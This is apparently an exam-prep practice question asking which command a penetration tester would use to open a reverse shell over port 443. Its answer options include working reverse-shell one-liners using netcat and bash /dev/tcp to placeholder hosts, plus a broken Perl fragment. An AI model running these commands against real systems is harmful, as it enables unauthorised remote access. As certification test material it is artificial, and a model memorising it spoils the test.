Prev Question
Next Question

A penetration tester compromises a system that has unrestricted network access over port 443 to any host. The penetration tester wants to create a reverse shell
from the victim back to the attacker. Which of the following methods would the penetration tester MOST likely use?

A. perl -e ‘use SOCKET’; $i='<SOURCEIP>; $p=’443;

B. ssh superadmin@<DESTINATIONIP> -p 443

C. nc -e /bin/sh <SOURCEIP> 443

D. bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1



Prev Question
Next Question

Leave a Reply

Your email address will not be published. Required fields are marked *